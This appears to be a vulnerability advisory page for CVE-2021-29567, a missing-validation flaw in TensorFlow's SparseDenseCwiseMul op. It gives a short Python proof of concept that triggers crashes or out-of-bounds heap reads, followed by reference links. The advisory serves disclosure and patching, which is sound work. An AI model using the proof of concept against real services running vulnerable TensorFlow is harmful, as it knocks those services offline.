CVE-2021-29567: Lack of validation in `SparseDenseCwiseMul`
(updated )
Due to lack of validation in tf.raw_ops.SparseDenseCwiseMul, an attacker can trigger denial of service via CHECK-fails or accesses to outside the bounds of heap allocated data:
import tensorflow as tf
indices = tf.constant([], shape=[10, 0], dtype=tf.int64)
values = tf.constant([], shape=[0], dtype=tf.int64)
shape = tf.constant([0, 0], shape=[2], dtype=tf.int64)
dense = tf.constant([], shape=[0], dtype=tf.int64)
tf.raw_ops.SparseDenseCwiseMul(
sp_indices=indices, sp_values=values, sp_shape=shape, dense=dense)
References
- github.com/advisories/GHSA-wp3c-xw9g-gpcg
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-495.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-693.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-204.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/7ae2af34087fb4b5c8915279efd03da3b81028bc
- github.com/tensorflow/tensorflow/security/advisories/GHSA-wp3c-xw9g-gpcg
- nvd.nist.gov/vuln/detail/CVE-2021-29567
Detect and mitigate CVE-2021-29567 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →